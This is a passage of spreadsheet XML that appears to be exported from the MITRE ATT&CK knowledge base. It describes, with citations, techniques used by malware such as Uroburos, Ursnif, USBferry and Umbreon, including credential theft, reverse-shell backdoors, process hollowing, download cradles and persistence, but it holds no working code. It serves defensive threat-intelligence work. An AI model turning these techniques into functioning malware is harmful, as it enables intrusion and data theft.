    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--e3e841fa-b806-4c22-9f98-a97950b68931</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--553dbb57-1174-494c-9cfd-dbc83ecc74f6</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can collect information from an air-gapped host machine.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--b45e744d-f9c3-4469-a410-137f1802536f</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can detect the victim's file or folder list.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--416c98b4-221d-4e2f-aed4-43b844a89ad0</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net user&lt;/code&gt; to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--0bbf5be7-e1de-419e-85ee-afaa431f60be</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--57e57dc4-b813-4e5c-882a-0021c7e0ff22</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;tasklist&lt;/code&gt; to gather information about the process running on the infected system.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--bfad86a1-f8bb-45eb-b7b9-5919ca4ef886</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net view&lt;/code&gt; to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--15a571d1-652c-4148-9dee-12d3b1cbff62</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>relationship--93bea600-6a8d-4f58-acf3-e7d604eeb451</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--95f2f687-4a70-4611-a420-2b8b53e2ee26</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can detect the infected machine's network topology using &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--74ade1b3-d2d8-4537-87da-41f54346a149</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;nbtstat&lt;/code&gt; to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--e6cd4568-3c15-4d1d-ab2c-c799141cf34b</t>
  </si>
  <si>
    <t xml:space="preserve">[USBferry](https://attack.mitre.org/software/S0452) can execute various Windows commands.(Citation: TrendMicro Tropic Trooper May 2020)	</t>
  </si>
  <si>
    <t>relationship--8e1c15c8-ba96-47b8-9feb-fade45d7fcf9</t>
  </si>
  <si>
    <t>S0221</t>
  </si>
  <si>
    <t>Umbreon</t>
  </si>
  <si>
    <t>malware--3d8e547d-9456-4f32-a895-dc86134e282f</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) creates valid local users to provide access to the system.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>relationship--f0b6fe64-e138-42c9-9cc7-896467dc26f8</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access to the system via SSH or any other protocol that uses PAM to authenticate.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>relationship--c4aec6a5-2c11-45a2-8c79-8cccf85179cb</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</si>
  <si>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</si>
  <si>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relationship--7653431a-18ac-43da-8308-63c76ecf0c22</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>relationship--85af8200-2e4c-4253-a334-0390ac4065f8</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>relationship--2f4d2f2e-78a9-46e6-bb2f-5b1be932da42</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of stealing usernames and passwords from browsers on the victim machine.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--a76e4748-2cef-4ee6-96a3-53ee227f0333</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--fb1ff794-8060-42c8-8969-b6660b07068f</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of downloading remote files.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--321544e0-902c-443e-adf9-d7e78f0e4d13</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of recording keystrokes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--ecde1551-bca2-4f45-8692-cbc583cf3d4f</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of spreading to USB devices.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--291df761-474b-4c5f-a9bd-2aaef0f80d70</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim computer name, physical memory, country, and date.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--02206f22-80e9-4f87-9e4b-5c1df1eb737e</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim's IP address.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--7a1e7afa-7052-4e47-8725-66e485efda43</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim usernames.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--1d3296a5-9a15-4bd9-a294-ee014348136c</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has used a combination of a Diffie-Hellman key exchange mixed with a pre-shared key (PSK) to encrypt its top layer of C2 communications.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--049eebb5-0686-4891-9cf7-cbf906cacdd8</t>
  </si>
  <si>
    <t>12 June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</si>
  <si>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</si>
  <si>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relationship--f2ae5e48-aded-40ba-8991-68b79638d6b0</t>
  </si>
  <si>
    <t>22 June 2023</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use its `Get` command to exfiltrate specified files from the compromised system.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--17c3e2e7-f208-408c-b767-6c5be92646c4</t>
  </si>
  <si>
    <t>23 June 2023</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can decrypt command parameters sent through C2 and use unpacking code to extract its packed executable.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--d1b6a397-4f29-4274-8394-1d5ca4fe9fc7</t>
  </si>
  <si>
    <t>26 June 2023</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use DLL injection to load embedded files and modules.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--d5ede6b1-984f-4e43-8d55-92d1efc5e8b6</t>
  </si>
  <si>
    <t>20 June 2023</t>
  </si>
  <si>
    <t>The [Uroburos](https://attack.mitre.org/software/S0022) Queue file contains embedded executable files along with key material, communication channels, and modes of operation.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--fd0c41df-35a7-4593-996c-0f9bdd6f4749</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use up to 10 channels to communicate between implants.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--a7005b59-48e5-4852-90f7-ed8d2c3698fa</t>
  </si>
  <si>
    <t>29 June 2023</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can run a `Clear Agents Track` command on an infected machine to delete [Uroburos](https://attack.mitre.org/software/S0022)-related logs.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--f02f49f5-35d9-4c9c-8943-9fdf34f02a38</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can search for specific files on a compromised system.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--fc825f8c-ee7a-4b03-9d67-cd736d61b893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</si>
  <si>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</si>
  <si>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relationship--59336377-92b2-4a82-97a1-414710a0a3dc</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use concealed storage mechanisms including an NTFS or FAT-16 filesystem encrypted with CAST-128 in CBC mode.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--561afb90-e94a-410f-9e6f-6880d996799f</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use a `Put` command to write files to an infected machine.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--b107d35b-fa2b-4dcb-844e-cacaf15f9982</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has the ability to move data between its kernel and user mode components, generally using named pipes.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--70efcdd6-80c3-4f95-981b-4da24639f32b</t>
  </si>
  <si>
    <t>19 June 2023</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can add extra characters in encoded strings to help mimic DNS legitimate requests.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--40050718-2e2c-4711-91ed-1c2fb59cd9f3</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use custom communications protocols that ride over SMTP.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--3ce884c7-71c5-4f46-b09c-1abb45d8341b</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has registered a service named `WerFaultSvc`, likely to spoof the legitimate Windows error reporting service.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--66db460f-5e90-4a79-a34c-f757f6c0b3ee</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</si>
  <si>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</si>
  <si>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relationship--61360c2f-0a26-49ca-ac7c-2758fcd26ea2</t>
  </si>
  <si>
    <t>16 June 2023</t>
  </si>
  <si>
    <t>Individual [Uroburos](https://attack.mitre.org/software/S0022) implants can use multiple communication channels based on one of four available modes of operation.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--a2006705-7f1b-4081-a074-5313f1d8c7af</t>
  </si>
  <si>
    <t xml:space="preserve">[Uroburos](https://attack.mitre.org/software/S0022) can use implants on multiple compromised machines to proxy communications through its worldwide P2P network.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
</t>
  </si>
  <si>
    <t>relationship--48aaad9e-bd08-4730-bf58-2c760a113ed4</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use native Windows APIs including `GetHostByName`.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--141a93b8-bfb7-4881-918c-7c91b7e41b25</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can communicate through custom methodologies for UDP,  ICMP, and TCP that use distinct sessions to ride over the legitimate protocols.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--3717f0c2-0963-4b6c-9603-bb01c06b9fe6</t>
  </si>
  <si>
    <t>08 June 2023</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use a custom base62 and a de-facto base32 encoding that uses digits 0-9 and lowercase letters a-z in C2 communications.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--66e16e88-626f-49c6-90f1-8c97286ef5dc</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use AES and CAST-128 encryption to obfuscate resources.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--ee7a5648-6263-4f1c-a975-e0d36740944a</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use its `Process List` command to enumerate processes on compromised hosts.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--db75183b-9ad3-41e4-9730-f0bba5ef55c1</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</si>
  <si>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</si>
  <si>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relationship--a4ceb321-f21d-4c62-9b49-cb0c64f0008e</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</si>
  <si>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</si>
  <si>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relationship--b4645fc7-ed61-46d8-a793-ce0e8e43b64a</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</si>
  <si>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</si>
  <si>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relationship--6ae983c6-b332-42d9-b489-87f475b6b9d6</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has the ability to load new modules directly into memory using its `Load Modules Mem` command.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--1040d9b9-96a4-4bea-9e8a-543befd50ebd</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</si>
  <si>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</si>
  <si>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relationship--eb74fa31-121d-4e43-9794-048a901f509a</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) uses a custom packer.(Citation: Symantec Waterbug)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--229e8b6e-6c16-406a-8def-7588aaae4fcb</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can encrypt the data beneath its http2 or tcp encryption at the session layer with CAST-128, using a different key for incoming and outgoing data.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--4153632f-9ac5-4f8b-af83-b4b089ce5429</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has the ability to gather basic system information and run the POSIX API `gethostbyname`.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--a0e4dc2c-1977-4c4c-a5ee-4710fb3ef1a5</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</si>
  <si>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</si>
  <si>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relationship--d71ad22f-7e01-4140-9080-bce4ae880880</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--47552c49-4027-41f1-ad5f-44e4533dbf19</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has the ability to use the command line for execution on the targeted system.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--53e9613e-a929-492a-885e-495ec3f4df9a</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) has registered a service, typically named `WerFaultSvc`, to decrypt and find a kernel driver and kernel driver loader to maintain persistence.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)</t>
  </si>
  <si>
    <t>relationship--ab554dba-2116-4dae-bc4c-47f76be72254</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--eafddae6-8e14-491b-82af-40ddaccb99c6</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers execute base64 encoded [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>relationship--7bb7b19e-83dc-4095-83b5-f647bf5f2800</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM objects to execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>relationship--3c4d8c8f-9676-48c5-b902-e95a2411e266</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>relationship--3c7ad637-8d4e-4baa-9cd9-7655d29e1e28</t>
  </si>
  <si>
    <t xml:space="preserve">[Ursnif](https://attack.mitre.org/software/S0386) has used encoded data in HTTP URLs for C2.(Citation: ProofPoint Ursnif Aug 2016)	</t>
  </si>
  <si>
    <t>relationship--45a113e7-452c-4bf3-9962-b0f71f386095</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has collected files from victim machines, including certificates and cookies.(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--7942bbcc-cff9-4cc6-b568-5fcd3b6a5ddf</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--6ee02f06-6250-4c75-b20f-c3271442f59e</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a DGA to generate domain names for C2.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--ab589bd1-49d3-422e-ac25-c24d2964b258</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTP POSTs to exfil gathered information.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--42de94e7-86f3-41d9-9e01-45fff8be1451</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has deleted data staged in tmp files after exfiltration.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>relationship--9b095c7b-09a8-4d4a-8452-98a2f069e73f</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM properties to execute malware in hidden windows.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>relationship--fcd9b8a1-60c0-4d6b-9742-77f9104f8e56</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has dropped payload and configuration files to disk. [Ursnif](https://attack.mitre.org/software/S0386) has also been used to download and execute additional payloads.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--0d88d99d-88b0-4e49-b2c3-3607a32069ed</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used tmp files to stage gathered information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>relationship--1e46f5cf-dfaf-4cc6-a685-ee876f371b7e</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>relationship--72b03734-7e03-4cfe-8f0f-2d366febfb79</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry modifications as part of its installation routine.(Citation: TrendMicro BKDR_URSNIF.SM)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--a6252cbd-82a6-4cd6-a5f6-74507cd49f72</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Tor](https://attack.mitre.org/software/S0183) for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--186ee163-fb1f-4a7d-b7d9-3c01efbb2be0</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used &lt;code&gt;CreateProcessW&lt;/code&gt; to create child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>relationship--1eb02abf-4bad-4672-a0dd-73fffc02bb47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</si>
  <si>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</si>
  <si>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relationship--117ca63e-7fdb-41e6-9f4b-e19a0e889061</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>relationship--8b368877-93b8-4ea9-84ef-84232412982f</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running processes.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--416447f0-410b-46d6-a4f8-e67ba3c9052f</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used process hollowing to inject into child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e1ba1028-0125-4f0e-8ccd-9273deac9d18</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a peer-to-peer (P2P) network for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--c2bbf923-e30e-4888-894c-7c8ba655c753</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Reg](https://attack.mitre.org/software/S0075) to query the Registry for installed programs.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--a16da3e1-c81e-4565-a78f-607cb937010b</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry Run keys to establish automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--084fc3bc-5e50-47fb-97d1-75fa00b6ed79</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected removable drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>relationship--fc0432e9-1b49-4be8-b86e-15cdec6b070e</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used hooked APIs to take screenshots.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>relationship--83c4e8d9-1746-43eb-af67-71e10a24da6f</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather system information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>relationship--b892d69f-bdfc-48e8-83f5-3081b9bffa4a</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>relationship--00490a17-1032-461b-8085-500d56bb80f5</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected files in network drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>relationship--f5faa97f-761c-4978-8535-2d9a42fcdd6f</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected code into target processes via thread local storage callbacks.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro PE_URSNIF.A2)(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>relationship--6e8621ee-9a1f-4a61-86f4-aae3c3d20d0c</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a 30 minute delay after execution to evade sandbox monitoring tools.(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>relationship--281eabd3-1965-4b62-8862-1edb15d49701</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used VBA macros to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>relationship--b5ebcf96-92f6-46d3-a9a1-1773e4f3ec02</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTPS for C2.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>relationship--957e1f09-4474-4c22-a7fd-7d70d3be61ff</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used WMI classes to execute [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>relationship--d9c20d20-cd4a-45cf-81a2-e9a8f6c9e78c</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has registered itself as a system service in the Registry for automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)</t>
  </si>
  <si>
    <t>relationship--89ed7e05-1f94-4693-b290-96c3a9ecd615</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</si>
  <si>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</si>
  <si>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relationship--83384e31-d9c6-46a0-956f-ee28d7d0cb89</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to download VBS files to the target computer.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--fe3b8cb8-8ff1-4abf-ac98-ce31108e5bb5</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) used &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\[a-f0-9A-F]{8}&lt;/code&gt; to maintain persistence.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--9cf55e84-53d2-4ec9-aaed-1df38ea08af1</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--338371ce-f2c3-4401-9e9a-c4c5667f87cb</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--c1cf1113-db4a-406a-8178-32fa4311d5dc</t>
  </si>
  <si>
    <t>S0257</t>
  </si>
  <si>
    <t>VERMIN</t>
  </si>
  <si>
    <t>malware--5189f018-fea2-45d7-b0ed-23f9ee0a46f3</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) encrypts the collected files using 3-DES.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--6b2770ca-bf5d-4994-8a7e-868c906f385a</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform audio capture.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--2c219416-4576-4215-80ac-1aebfadefd8b</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--57a9c0ef-6b92-415e-9f72-a78483e35f5f</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects data stored in the clipboard.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
